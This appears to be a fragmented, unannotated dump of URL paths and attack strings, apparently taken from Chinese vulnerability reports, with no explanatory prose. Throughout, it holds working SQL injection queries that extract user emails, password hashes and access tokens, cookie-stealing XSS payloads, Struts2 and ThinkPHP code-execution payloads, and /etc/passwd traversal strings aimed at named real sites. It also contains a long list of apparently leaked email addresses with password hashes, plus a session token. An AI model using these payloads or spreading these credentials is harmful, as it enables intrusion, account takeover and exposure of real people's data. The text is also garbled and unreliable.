/index.php/crowdtest/bug/displayBugList/?sEcho=1&iColumns=6&sColumns=&iDisplayStart=0&iDisplayLength=20&iSortingCols=1&iSortCol_0=2&sSortDir_0=,If /index.php/crowdtest/bug/displayBugList/?sEcho=1&iColumns=6&sColumns=&iDisplayStart=0&iDisplayLength=20&iSortingCols=1&iSortCol_0=2&sSortDir_0=,If /uploads/pai/photos/201208/big_1344427981_1281058497.jpg alert(document.cookie) 
/photographer/id/34 void(0) /default.php /nologin/chooseNumber.action /looyu/chat/.svn/text-base/down.jsp.svn-base /cgi-bin/comment/adm_login.cgi /auto/4s-admin/login.php /admin/ /admin/index.php /manage/login.php /admin/web/login.html /admin/ /admin/adminMain.do /beta2/simple_admin/flogin.html /auth?next=/ /2010mini/lephonesns/admin/ /admin/testLogin.jsp /search_wp/admin/login.php /admin/ /admin/admin/login.jsp /freeform/admin/user/login.jsp /admin/login.php /manager/login/ /control/login /manage/login.php /admin/managerLoginAction.do /admin/admin_index_login.asp /wp-login.php / /admin/login.jsp /docinadmin/author/login.do /admin/Login.aspx /plaf/login.jsf /cgi-bin/webmail /tv/ /zhuanti/xwxs/index.php?page=4 /customer/ /login_old.php /admin%21index.action /admin%21index.action /ngoss/Login/Login.aspx?ReturnUrl=/Default.aspx /1860/ /Club/admin/adminIndex.jsp / /login/login_rollback.action /ShowArchive.action?aid=ff8080813479adf20135ae5894f9010c /site/5852576 /friend/action/add?id=账户id,我用hucexe账户登录,发现收到被加好友消息,点击,结果弹出了tmxkorg帐号测试的xss。 /friend/action/add?id="+i /pages/comment/addContentComment.do?rpid=38 /pages/comment/addContentComment.do?rpid=38&rcType=1&cid=2&commentContent=留言内容@tmxk.org /pages/comment/getCommentOfFont.do?rpid=38&rcType=1&pageNo=1 /pages/comment/webComment.htm?rpid=38&rcType=1 www.zfsoft.com:3389 /zfca/ / /admin/ /show.php?id=214 %74%65%78%74%2F%68%74%6D%6C%2C%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%76%69%6F%64%28%30%29%3B%3C%2F%73%63%72%69%70%74%3E",发帖后firefox用户点击就悲剧了。 /emoi_store.php?id=120 /control/ /showSrvLink.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) /install /Admin/AllUserList.aspx /sina_login.php?jump=http://i.tao123.com/#access_token=xxxxxxxxxxxxxx&remind_in=******&expires_in=******&uid=****** 
/bank/bankHome!displayInfo.action?infoId=1361079 /vote/vote2.asp?id=34 /home/award_exchange_home.htm?succ_coins=5033234241234&closeCoin=false&tracelog=fkcgymqzicon&itemId=14882088052 / /porpoise/xmgl/index_admin.asp /frontoperation.rar /admin/ /web-console/ServerInfo.jsp / /swj/kjfw/news_kjfw!view.action?fileNews.file_ID=20144811&sysDaoHang.code=011014 / /shop/bss_list_iframe.php?pdhtype=2 /shop/admin/ /shop/admin/Dialog/listfile.php?dir=../../upload/webeditor/&ext=php http://duiyi.sina.com.cn/register/chk_id.asp?rid=wooyun&div=1 /Web/Chain/ShowHotel.aspx?Uid=8023 /card/ui/login/login.action tmxk.org/q.js / / /thinkphp.sql /index.php?app=admin&mod=Tool&act=doDownload&filename=../../config.inc.php /account/reset.php?code=XXXXXXXXXX可重复使用,导致可短时间内修改大量用户的密码,危害十分严重 /2531650746 /cgi-bin/personal/get_user_friends.cgi /cgi-bin/search_ent?keyvalue=\u003cimg%20src=%23%20onerror=eval%28/document.write /cgi-bin/search?libid=1&attr=133&tname=star_second.shtml&keyvalue=\u003cimg%20src=%23\u0020onerror=eval /notes/view/7e90912a17f3f701b2dd4bc0 /qzone/mobile/login.html /485/index.php?gOo /485/?member-120120822173108'/**/and/**/ExtractValue /shopex/shopadmin/index.php /shopex/shopadmin/index.php /bugs/wooyun-2012-010431 /chinahrdvote/2009/OrgInfo.aspx?id=92 /pay/result/xft?sae_internal=1&may_fail=0&order_id=1 /pay/result/xft?sae_internal=1&may_fail=0&order_id=1 //pay/result/xft?sae_internal=1&may_fail=0&order_id=-1%27%20and%201=2%20union%20select%201,concat%280x7c,email,0x7c,weibo_name,0x7c,weibo_access_token,0x7c,password_md5,0x7c%29,3,4,5%20from%20sae.user%20where%20weibo_uid='1627825392'%20limit%200,1%23 //pay/result/xft?sae_internal=1&may_fail=0&order_id=-1%27%20and%201=2%20union%20select%201,concat%280x7c,accesskey,0x7c,create_uid,0x7c%29,3,4,5%20from%20sae.app%20limit%200,1%23 /index.php?app=campusgroupbuy&cateID=1 /?app=buy&city_id=%22%20onmouseover%3dprompt%28970140%29%20bad%3d%22&group_id=17 
/?address=%E6%B1%9F%E5%AE%81%E5%8C%BA%E5%8F%8C%E9%BE%99%E5%A4%A7%E9%81%93&app=store_map&id=62&map=118.785401,32.000455&sname=store&store_name=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28997246%29%3c%2fScRiPt%3e /index.php?act=index&app=search&keyword=1&searchBtn=1&type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28973765%29%3c%2fScRiPt%3e /index.php?app=campusgroupbuy&cateID=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28964089%29%3c%2fScRiPt%3e /?app=buy&city_id=1‘&group_id=17 /index.php?app=campusgroupbuy&cateID=1%27%22 /?app=buy&city_id=1%27%22&group_id=17 /external/modules/datacall/module.info.php /info.php /phpmyadmin/scripts/upgrade.pl /themes/mall/default/styles/default/images/member/thumbs.db /themes/store/default/groupbuy.index.html /api/ /data/ /data/files /xss.js /iPhone/index.jsp?basname=&setUserOnline=0&sap=null&macAddr= /manager/html /pages/album/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// /pages/album/swfupload.swf?movieName= /zWReXd8 /y122y2 /enpgt7 /difang_admin/admin/ admin /bbs/view_topic.php?tid=3136&vid=10 /admin_login.php?backurl=http%3a%2f%2fsurvey.news.ifeng.com%2fadmin_login.php&tm=1335580166600&uid=mengcs interlib/websearch/bookSearch /里面的商场,在购买的数量上没有考虑到负数的问题,导致当输入一个负数数量时,不扣元宝,反而还加元宝。 /pages/showBankAddress.action /manage.php /manage.php /manage.php /aticle/content.php?id=23969&cid=3/?from_0&qd=yoka&userid=45731526632你会发现里面有编辑 /a.php?v=elong&c=’document.cookie’ duapp.com/a.’” /?o=sso&m=info&func=wooyun www.mmqx.gov.cn /site/baidu.html?www.mmqx.gov.cn /s?wd=456+mmqx.gov.cn&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=4672 www.mmqx.gov.cn /site/baidu.html?www.mmqx.gov.cn /site/baidu.html?www.mmqx.gov.cn www.nanzheng.gov.cn被入侵挂马 /s?wd=456+nanzheng&rsv_bp=0&rsv_spt=3&inputT=2922 www.nanzheng.gov.cn /456s.asp /s?wd=wl.bynr+456&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=3531 /456s.asp www.ordosgajj.gov.cn /s?wd=456+ordosgajj.gov.cn&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=3656 www.ordosgajj.gov.cn /index.htm 
www.diqing.gov.cn / /s?wd=diqing.gov.cn+456&rsv_bp=0&rsv_spt=3&inputT=2359 www.diqing.gov.cn / / /extensions/ExtBank/360/index.htm /s?wd=gra.njut.edu.cn+456&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=375 /extensions/ExtBank/360/index.htm www.ff456.info /s?wd=456+dxzf.gov.cn&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=1703 www.dxzf.gov.cn /index.htm phpspy /shopex/shopadmin/index.php / /examinate/system/login.do /examinate/system/login.do /login.action /ourgames/admin/ /clear/admin/managerUserServlet /?g=admin&m=Video&a=preview&t=5&id=39896 /cpmanage/system/admin-login / /center/system/login.do /spread2/admin/tologin.html /tdap/ 1px 10px 14px;font-weight:bold 1px 5px 22px;padding:5px right;line-height:22px;font-weight:bold;padding-right:10px /sina-zz-api-call.html /remind/unread_count.json?target=api&_pid=0&count=0&source=3818214747 /2/oauth2/authorize?client_id=3818214747&response_type=token&display=js&redirect_uri=https://api.weibo.com/xd.html /ppjy/ /html/content.php?cont_id=77存在注入 /member/person.php /member/person.php /OrderQuery/cgs_list.aspx?para1=cxtm¶2=cxtm¶3=0 /a/5513025-1688340641.html /a/5513025-1688340641.html访问中不中 /index/login?&passwd=123456&submit=登录&phone=18624029930 /favorite/optsp?urlfrom=search&process=prompt1&pkid=1771658 /favorite/optsp?urlfrom=search&process=prompt1&pkid=1771658 /agentreport/getLinkImageShow?linkImage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /一卡通综合管理平台struts2漏洞 /verification.action /zecmd/zecmd.jsp /mega/ mega /colorring/index.jsp 118100.cn action JX01 login.jsp /customer/index.aspx /Jwweb/_data/index_JSRP.aspx /Jwweb/_help/ /cgi-bin/player/main.cgi?id=357 /snjyw/user.jsp /snjyw/sn_group.do?method=addForm /snjyw/sn_user.do?method=add /snjyw/sn_user.do?method=showList /snjyw/sn_user.do?method=editForm&userid=22 /snjyw/sn_group.do?method=checkUpdateName&groupId=11&groupname=22 /snjyw/sn_videoSort.do?method=showList /snjyw/sn_video.do?method=showList /snjyw/select.jsp /snjyw/sn_houseproject.do?method=test 
/snjyw/sn_houseproject.do?method=add /snjyw/sn_houseproject.do?method=add /snjyw/sn_projectsort.do?method=add /snjyw/sn_projectsort.do?method=showList /snjyw/sn_material.do?method=select /snjyw/sn_material.do?method=showList /api/async.php?a=ids&p=21233-22604-7861-20859-19420 /jasinda/iswin.txt /JwGl/bbs/viewuser.asp?name=sudo(sudo改成你注册的用户名) /JwGl/bbs/viewuser.asp?name=sudo'and%201=convert(int,(select%20top%201%20SFAdmin_Account%20from%20SFadmin))--获得管理员账号 /JwGl/bbs/viewuser.asp?name=sudo'and%201=convert(int,(select%20top%201%20SFAdmin_Password%20from%20SFadmin))-- /JwGl/ /StudentCenter/StudentInfo/StudentInfo.aspx?Type=1&StudentCode=C0855101102001203000005 hp_xpi:window['cehp_xpi']?window['cehp_xpi']:'http://download.firefox.com.cn/chinaedition/addons/cehomepage/cehomepage-latest.xpi',mosts:[],lasts:[],init:function() /'||startup.homepage()=='about:cehome /'||startup.homepage()=='about:cehome 50px;display:block;text-align:center 50px;display:block;text-align:center function() hp_xpi:window['cehp_xpi']?window['cehp_xpi']:'http://download.firefox.com.cn/chinaedition/addons/cehomepage/cehomepage-latest.xpi',mosts:[],lasts:[],init:function() function() /ff.js /n.js></script> /w.html /a.php hp_xpi:window['cehp_xpi']?window['cehp_xpi']:'http://download.firefox.com.cn/chinaedition/addons/cehomepage/cehomepage-latest.xpi',mosts:[],lasts:[],init:function() function() /w.html /3wYfI3 /n.js /file/etc/updatemepasswd /uploads/sb.txt kwspecial@gmail.com-password:88e519826c6e7f64ed83dd5f222cbf5b 435420828@qq.com-password:0794fdd7a3f98153a04bfbd6b3ed2e4f 435420828@qq.com-password 932502597@qq.com-password:0794fdd7a3f98153a04bfbd6b3ed2e4f 372486983@qq.com-password:8983683b49b1e5117fa3775bd4ea8e71 ruixuanbai@gmail.com-password:538344bd3ab84ecf3b2a8257f4bfb69b cadenza91@sina.com-password:b56f2eaa47d7bafdd427fd833831564e 421928578@qq.com-password:a1a4419eff3ca6dc2d3fa227d79f7382 popoki@foxmail.com-password:59dbc0fa881406b3ab85826ba15712fe 
yutong180323@163.com-password:3821744b73566f2419fba2643d07a495 rapfish@qq.com-password:4cdae08ec4b134593960e3bac693fc26 2573417504@qq.com-password:e35f328b65afdf9c255216d37f2ec4ca 63195888@qq.com-password:7531b9818a9085dd5aa269569a955d90 dai_bigtree@263.net-password:1e077f0bf453bb351ccd20211c1f1c50 hzwsy1991@163.com-password:08e55e7ddd48424cfba1c0f07cb0a5d9 86073120@qq.com-password:1b30b7acdf6e5bf7ccb1a73e4a48839e futureworker@gmail.com-password:f24fcf42969d71912f79bc7ff3ed8051 sq1022@gmail.com-password:4d7032fd1c3ee3d7054807a366d5c5ec s2x0f2@gmail.com-password:a1b69e9ee73f511993cf3f2bd4043080 59961317@qq.com-password:ac115e77aedf3c2770aca540dbc4f842 939923306@qq.com-password:09b22190be57d5de15a18a494034e91a jarber@yeah.net-password:9b1b83839625e011575b6728c1db7053 871987430@qq.com-password:dd812a2d1b9e7bbc6fdaed46e64daa53 vow7136@sina.com-password:c9145ec4c54a81d9e3279a13b27bf7ed 304825493@qq.com-password:331c2679989ba11f2357a960bdc8601e orchidc@gmail.com-password:807c21c0b99b29c6de4f29c255906ee2 ji.cao@live.com-password:8016a3012286645575ebe3a361a63459 ji.cao@live.com-password jiangpeng8424@gmail.com-password:dadf5c1b59ef532717f2b14c614fe727 cnyouker@solidot.org-password:9bc3122074b40d9d9470ff893fdd4cc1 siemendracula@163.com-password:2cf4efdd0eb20af9149cd2e65eeb06f7 1527026511@qq.com-password huajs1980@sina.com-password:2b479a243e91a3b070d2a5e4369cad13 liyangrobben@vip.qq.com-password:258a4fa98d83e4776a5a0eca80312970 ljc199077@163.com-password:23205959aa168add4bd1dc8616d470dd liupaocha@sina.com-password:1cfc8d22758737274d15c8ab4b5c5f9c 443900198@qq.com-password:df0dbd3845c3bc79f1a979a9fa9dc426 ayn715@hotmail.com-password:4c1070c7bdd8edc15f6b27d691b2a98b arsenalfanye@yeah.net-password:7d8b2544edf58c5aea5d45fbc6a6d59a autxlt@163.com-password:0ee5c42feab7c0f8295d393c49506582 lynndodo@126.com-password:0f4137ed1502b5045d6083aa258b5c42 circleyq@gmail.com-password:c19ac054c8a5c4e548e36383bd0b2ec7 117261325@qq.com-password:5585a302921b70059a618ad06c365da3 
lhzzxa@gmail.com-password:b0567a2055f3bccc97a4ea3f27bce51b 334928337@qq.com-password:dc4451d61415c741db8570c378ee2b1d chenhao7179@163.com-password:32c501c605a01b2b6b84cbe6dbcb7e64 liujunyan5615@gmail.com-password:6e528ea73c3efb6a4bdd836fd017b427 836912795@qq.com-password:064f08d4a4ab5f9025698803ebd98954 289821127@qq.com-password:da95860a9dde291249a0a02b90255962 449255721@qq.com-password:32186824cc871688d94a0f69f1fff996 349881438@qq.com-password:0bb507d15ef53588d995f10011a8163b zlinetony@163.com-password:2eaea49f993994eee87171bdafce87be nick_out@msn.com-password:82ee378cb20fe94bcff7d01df363b216 chulian198563@sina.com-password:b7569e7388e663a1512050218c66d08a 15117968@qq.com-password:ee606053902dd7741d5bd46f7de2b53d 1409321237@qq.com-password:fbbdc876f33d97146ceda5af1d31772a 244891344@qq.com-password:945609558c8a3995bf2030d30e2f310e 13822527722@139.com-password:8b471d2c07b2537791d6234d64ddee2b 356255531@qq.com-password:db88ae12e02d23c4e2f484aee768748c jjjabc123@gmail.com-password:32546b751eb75ce027f0197f695e2f98 934271474@qq.com-password:b9bf338cfff10644a7708c8ce1d9ed12 360962152@qq.com-password:868ab18969d3f8b59c8671777f93730f fxxkmsn@gmail.com-password:ac886f6f68837c4f909e56c412388285 314739532@qq.com-password:4404e8a76f6835e97d6db0fedd103482 daleq1118@hotmail.com-password:58963df817d4f28741b3c558f377b67d fatjun@gmail.com-password:28331f55541279ef8950c15d16c8bdcd 275240479@qq.com-password:25d73c271c1dd95c54cfca9bfe3d9dfe leegook@gmail.com-password:da08ee40511ad8854810365411e2269e liuxv_123456789@163.com-password:b17301d76ac092e7b32a3083f74585a4 csy0093@sina.com-password:08ca9c5d74bf28887cbe62ae4242479f cadenza91@sina.com-password 1580110524@qq.com-password:92e803b2ae9581ee9a65a5bd08aac1b1 blueinsky_lee@hotmail.com-password:bbefeba062f816d0c68bb6b757f54f28 spiolynn@yahoo.cn-password:ba065b1e6e716746d83dd76392262ce4 andyzhang87@gmail.com-password:be9072eec6d7b4030d24712403cb549f 48971903@qq.com-password:78296ae4f312544e530eea6260b7983e 
kai_e@yahoo.cn-password:8fef3f36f2d0e69a01b670511aa3d4f4 cao91peng@126.com-password:2309275ac43161f935b00029743c753d crazylinhui@163.com-password:9643f71b3067a01dc7f3845719535482 29865567@qq.com-password:1cd341f93d7147a4bda6d2eac899fe1d 583066798@qq.com-password:8d94c6fa8db4ad63921820c6914bc66a onlyzeiss@sina.cn-password:e24f4383920303ed47c71206d221085a cqw1128@gmail.com-password:13cebba6d1bb0e3e70d289ff0fe4668a yanzi66@hotmail.com-password:0747976ce03d81883551da99c2346b8b 123093299@qq.com-password:7e759aa4804fbf540b9d3a6f9cbad2b4 118104512@qq.com-password:3c1b8a0137db234f18c9b6dd2a37ce5d lxmouseustc@163.com-password:317204bbb3b70c97e61d9af7b471f28e 406836126@qq.com-password:60557c6d0518db7fbba41a392b63d114 titanhu@qq.com-password:e7ee70e3c2f0986271eb5699693ac339 manxiao@vip.qq.com-password:db5efa0d7f411deb0183ebaf4b1f7c14 xia.dongdong@163.com-password:e0584e5ca01caea7c47c077978f88ce2 maple_zhifeng@yahoo.co.jp-password:e9086f624f5f1b754aaa11e6eff4c3b3 278415914@qq.com-password:ddd42eea9f20e367ca6ab435fcada586 mhxy13@gmai.com-password:437134ebf5f68fadd04121ce5a984bc5 181034780@qq.com-password:b78c98c650a008018e1503b38d6f3ff7 30601@qq.com-password dinuodefangjian@163.com-password:6b3df585bc316bf93ad05421feed7fb7 yanhou_liu@yahoo.com.cn-password:6c7dfe6096c793bfe593ec66dcb4ffb6 yzhou118@gmail.com-password:929e565875f0ff0216b35b26b64e09f8 lwkdota@qq.com-password:f3228715d5025ec342e95280e0f7248b 1255163139@qq.com-password:bbd11c7b6666e8b9fb638a69baad0672 hndingkai@sina.com-password:da3e7686e6d2bd6916c20bb911f90b77 liujianzhao@live.cn-password:33814acc0b112f9c4a7d49a407321729 1207397812@qq.com-password:2a42591722571f604899f3c1cc657ca0 niubi@asu.edu-password:1d1208991fe6d3af56e59c8b6f58d466 wz1758@163.com-password:06d2905af95979811ca987e3a7fdcb91 qianyu_wu@qq.com-password:cddea3b3655d9a56838e09c89a1ec741 shuanglingcom@hotmail.com-password:864752e55a1618c73fbea27df9221181 shuanglingcom@hotmail.com-password 573724007@qq.com-password:22638a3131d0f0a7346b178fd29f939c 
/test.php /...../%20all /log /log/detail/yayuncheng/120825 /product/detail?prod_id=39 www.alibaba.com/ /sogou?pid=AQxRG&query= /sogou?pid=AQxRG /xplatform/)订单页设计缺陷,可查看任意用户订单,导致客户姓名、电话、住址等信息泄露。可用软件遍历后大量收集用户信息。 baoku.360.cn/app/search?kw= baoku.360.cn/app/search?kw=%df baoku.360.cn/app/search?kw=%df /wish/index.php /teng/jkzx/%E6%96%B0%E5%BB%BA%20%E6%96%87%E6%9C%AC%E6%96%87%E6%A1%A3.txt /teng/%E5%85%89%E8%BE%89.txt /jerry/liuyi/baby.asp?id=438 /user/user!personalCenter.action /index/index.action /login.php /Fittings.aspx?type=31 /assessOnLine/Login!loginOut.action /welcome?history=http://kan.weibo.com/1577826897/myxss%27/%3E alert%28document.cookie /jsp_cn/jquery/end/product_message.jsp?pid=【文档ID】&islogin=0&code=&userIp=【IP地址】&message=【评论内容】&date=1346072806861 / /search?lm=2&word= /admin/home.php /admin/tj.php /listgoods/index/cat_id/+union+select+1,2,+-- /listgoods/index/cat_id/+sleep(1)%23 /listgoods/index/cat_id/+unio / /list/14565.html /pageview/pos?app=from_tag&url=http://www.jiapin.com/list/14565.html user.jiapin.com/pageview/pos?app=from_tag&url=http://ebay.de /cps/cpslogin/together/c5ac81fe5e0d6246dcb4c769ead4c3ea?url_t=http://news.jiapin.com/html/zx/jiapinguandi/2012/0822/6690.html /html/zx/jiapinguandi/2012/0822/6690.html /cps/cpslogin/together/c5ac81fe5e0d6246dcb4c769ead4c3ea?url_t=http://ebay.de /sxw/PasswordFindAction.findpassword.act /sxw/PasswordFindAction.tofindpassword.act?uid=1484517&type=004 /index.php?controller=common&action=ajaxup /wxqmx.html?rf= /rxhzw.html?rf= /sqol.html?rf= /jxqy.html?rf= /frxz2.html?rf= /sxd.html?rf= /mjcs.html?rf= /gtj.html?rf= /long.html?rf= /wl3.html?rf= /xksj.html?rf= /blcx.html?rf= /hhsh.html?rf= /dpcq.html?rf= /mhfx.html?rf= /tdyx.html?rf= /hhzw.html?rf= /qjp.html?rf= /wxfy.html?rf= /jjol.html?rf= /zzsf.html?rf= /mg.html?rf= /hddh.html?rf= /astd.html?rf= /frg.html?rf= /tc.html?rf= /hysd.html?rf= /ftx.html?rf= /ogzq.html?rf= /sgs.html?rf= /ddt.html?rf= /soccer.html?rf= /yqcm.html?rf= /content/878 
/purchases/updatecart?number=-1&cartId=214358 /purchases/updatecart?number=999999999999999999&cartId=214358 /user/orderMsgList.do /user/edit.do?id=1704&currPage=1 /user/edit.do?id=1704 /index.php?a=detail&c=leaderboard&page=%5c&tid=26 /index.php?c=skillsets&firm=%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28CHAR%2852%29%2cCHAR%2867%29%2cCHAR%28117%29%2cCHAR%2886%29%2cCHAR%2890%29%2cCHAR%2884%29%2cCHAR%28115%29%2cCHAR%28105%29%2cCHAR%28121%29%2cCHAR%2866%29%2cCHAR%28114%29%29%20from%20information_schema.tables%20limit%200%2c1%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27 /index.php?a=checktest&c=member&tid=113%20or%20%28sleep%282%29%2b1%29%20limit%201%20-- wenda.hiall.com.cn/index.php?c=skillsets&firm=-1%27%20or%2049%20%3d%20%2747 /?a=%22%3E%3Cscript%3Ealert%28%22magic%22%29%3C/script%3E&c=leaderboard&tid=null /?a=1&c=%22%3E%3Cscript%3Ealert%28%22magic%22%29%3C/script%3E&tid=null /index.php?a=logininfo&c=skillsets&firm=%22%3E%3Cscript%3Ealert%28%22magic%22%29%3C/script%3E /index.php?a=${@eval($_POST[admin])}\&c=test&cid=46 /system/FunPages/Frame.jsp?FileName=UpFileForm.jsp&Path=/Files / / /mini/2012duanwu/admin//Batch.php?no=21 /mini/2012duanwu/admin//Batch.php?no=21 /mini/2012duanwu/admin//Batch.php?no=21 /mini/2012duanwu/admin/list.php /viewics.php?id=155 /FCKeditor/editor/filemanager/connectors/test.html /pages/smb/products.asp?c=18 /templates/login.html,给地接社中国国旅的产品发布系统。 /w?user=wise&m=9f65cb4a8c8507ed4fece7631042843a4c10db212bd7a7402c88cb1384642c101a39fee872754c429392293c40e91e1cfdf041306d4137b6ef9ed55ddccdd27f7ad36672275c /bugs/wooyun-2010-010033 / / /bugs/wooyun-2010-010033 /article/file/cid/[cid]/?file=../../../etc/passwd /app/album/ /6912275/tag/photo/xss.html /6912275/photo/6359464/ /6912275/photo/6359464/ /up/2012/08/29/132120.28194126_160X160.jpg /uploads/c.php?c="+document.cookie /Service/Twitter.msi /Service/Twitter.msi /index.php /web/admin.php 
/hotel/hotelUnion.aspx?Articleid=14776 /index.php?app= www.htceshop.com对支付数量的限制不足,导致可以组合商品刷ONE /search?q=cache:vKlPcmxcbgQJ:dyactive.vip.xunlei.com/zhanzhang/report.php%3Fmethod%3Dindex%26key%3DZ4sV6HHkZ%26select%3D2%26webtype%3D3%26issource%3D2+&cd=1&hl=zh-TW&ct=clnk&gl=hk www.m.cn /group/initInfo.action /Cater/store/findCity.action /kindeditor/kindeditor.js /hdlAdmin/pages/login.jsp /source/function/function_connect.php /index!index!gotoProductsDetail.action?id=1149 /upload/ /guest/ /user/ /cache/ /admin/ /post/327306/?replypage=1#reply1895695 /post/327306/?replypage=1#reply1895697 www.zxhsd.com)下单页设计缺陷,导致订单价格可以随意修改。 /web.rar d417b7269a81cd1:1368 /p/iphone-elite/wiki/sendmodem /userlogin.action /index.action /vibtest/index.action /copyright/out.action /custody/out.action /jingsaiqt!Index.action /teacher/front/list.action?columnId=19&siteId=3 /index.action /wplw/adminlogin.action上海对外服务劳务平台 /invoicing/netpage/qiantai/adminlogin.action /201208/story/?page=2&t=66&sn_id=1 /account/UserAccountview 14.0 /account/UserAccountview /jxwsbm/PrintZkzLoginAction.do?activity=login /static/common/html/v2Jump.html?callback=alert(/xxx/) /zW1EqRD /search/ressafe.html?q=&url=javascript:alert(/xss/);//http://baike.baidu.com /user/71/09/140/1400971_beta.null?random=50.59399029793914(IE8测试) /php/interface.php?a=show&c=Login&m=Admin /php/interface.php?a=show&c=Login&m=Admin /php/interface.php?a=show&c=Login&m=Admin /php/interface.php?a=show&c=Login&m=Admin /php/interface.php?a=show&c=Login&m=Admin /php/interface.php?a=show&c=Login&m=Admin /admin/comment.asp?idtype=&id=&authorid=1'&author=&dateline1=&dateline2=&message=&ip=&orderby=&ordersc=desc&perpage=20&ac=comment&searchsubmit=%CB%D1%CB%F7 /admin/album.asp?albumid=552 /admin/pic.asp?albumid=1'&picid=&postip=&filename=&title=&hot1=&hot2=&dateline1=&dateline2=&orderby=&ordersc=desc&perpage=20&ac=pic&searchsubmit=%CB%D1%CB%F7 
/admin/thread.asp?clubid=1%27&subject=&tid=&dateline1=&dateline2=&viewnum1=&viewnum2=&replynum1=&replynum2=&hot1=&hot2=&digest=&orderby=&ordersc=desc&perpage=20&ac=thread&searchsubmit=%CB%D1%CB%F7 /admin/post.asp?clubid=1%27&tid=&dateline1=&dateline2=&message=&ip=&isthread=&orderby=&ordersc=desc&perpage=20&ac=post&searchsubmit=%CB%D1%CB%F7 /saveUserinfo.do /pub.asp?key=%C8%CB%C3%F1%D3%CA%B5%E7%B3%F6%B0%E6%C9%E7%27%20and%20user%20%3E%200%20-- /php/interface.php?a=show&c=Login&m=Admin /jx3/recall/index.php?c=display&a=xx /jxsj/girlchoice/index.php?act=newimageurl&callback= /jxsj/wldahui/index.php?zoneid=z01&serverid=gate0104 /brokerinfo.php?id=13 /brokerinfo.php?id=13 /platforminfo.php?id=13&pid=25 /detail/index/soft_id/1462?recrefer=SE_D_ /91admint/ /91admint/make_html.asp?type=xml&url=../UploadFile/2012830152315.gif /template/xiaoma.asp /page/submitfb.html / /content/44 /index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D /index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D /index.php/module/action/param1/$%7B@print(eval($_POST[c]))%7D /feedback.php?id=ddasdsa12sadsa1239131231==&email=xxoo@noshow.com /admin /Portal/PostInfo.aspx?postId=03e61fc1-2816-485f-8a97-5260af773980&CategoryId=cc70786a-78f9-4ef9-bff5-ddb8b0fc4e5b /shop/ /IndexAction.action /zt/aj/comment/add页面: /zt/aj/comment/add?_rnd=REPLACE_WITH_UNIX_TIMESTAMP /mail/login.action /course/?id=1 /shop/item.aspx?id=2 /resource/script/modules/boke/bokeSetting.js中有简单的字符限制(16字节),不过既然是本地js验证,显然可能通过本地搭建jsWEB应用篡改绕过。 /teacher/front/list.action?siteId=3&columnId=19 /teacher/logout.action /logout.action /cms/cmsfiles/project31/html/default/index.html /common/default.action /childsite/KA029/index.php?option=com_sectionex&controller=../../../../../../../../../../etc/passwd%00 /login/webindex.action /user/addMood,而该操作接受参数info[moonpic]和info[moodPic_mini]两个参数,参数的值分别为大图和小图的地址。 /webapp/wcs/stores/servlet/ForgotPasswordView /webapp/wcs/stores/servlet/ResetPasswordView?storeId=10052&email=邮件地址&activeCode=六位字符 
/emall/RetrievePasswordView?storeId=10052&catalogId=10051输入用户名admin,会暴露管理员的邮件: /sz114/baoLiaoList_info.action /course/instance/?id=4091 /myspace/MyDiaryList.asp?username=admin /rest/2.0/pcs/file?method=upload&type=tmpfile&app_id=250528&BDUSS=56ZGZCbFBzYmlXWUlucDhpNU96WllJeDB0UEltN1pPSnlmYTAtMjNZTll0Q3RSQVFBQUFBJCQAAAAAAAAAAAomjxcmmz8AZ2Fpbm92ZXIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAYIArMAAAAOAqJXUAAAAAmWdCAAAAAAAxMC4zNi4xNFhmPlBYZj5QTk /api/create?a=commit&channel=chunlei&clienttype=0&web=1 /api/create请求中,md5值为cc99e700ed6e009c7d08ce4117179a5c /user/order_detail/?orderno=20120903301048 /user/order_detail/?orderno=20120903300917 /index!gotoProductsDetail.action / /personQueryRecord/list.action /Admin_FeedBack/DP_Admin_BrowseEmail.aspx?FeedID=xxx /sign/signViewList.action?useCount=0 /framework/login.action /framework/login.action /framework/login.action /naqianKey/infoUser!getinfouser.action?keyid=ff80808134ad63f20134b1db61740321&keyname=%D3%CE%CF%B7%B5%E3%BF%A8&pageCount=2 /images/help/u20.jpg/1.php /uvlogin.do /initService.action?actModule=SERVICE_YXDKNR&actId= /payonline/gztpay/qq/query_qq_price.action?nGoodsID=1 /booking)选择好拍摄时间并填写完毕相关表单后提交。 /goods!list.action?tid=2 /course/?id=1(好像修复了) /admin/index.htm http://svr.f.xunlei.com/folder/mkdir?xltime=8038554 POST requestType:8038554 http://f.xunlei.com/postProxy.html userId:53393744 /xss true /bugs/wooyun-2012-07709 /code5/submitVisit.php?vi=6716ef08df6a71db6d38cc4811666213&userData=1629814 /index.php?app=email&act=verify&vstr=5d4a3vIadUSeay1AP1uQnxzogiuCY6qFU/**ADD**/LFmzBGL0AmjMtFBPeO7of/Ss7jkwlEMS3SGYaI&from_url=http%3A%2F%2Fwww.baidu.com%2F //1111.php /zhuxian2/fifthanniversary/fifthQuery!getContent.action?works=3083 /InfoAction!showDetail.action?info.infoId=1178§ionId=TZGG /newsMessage/news_listFront.action?modle=1&pager.offset=180&listRange.pageSize=18 /student/school/login.action /a/score?pid=3156227123&gid=201850&docid=844986&type=s&score=100 /billboard/?TopTypeId=1 /.svn/entries /.svn/entries /.svn/entries 
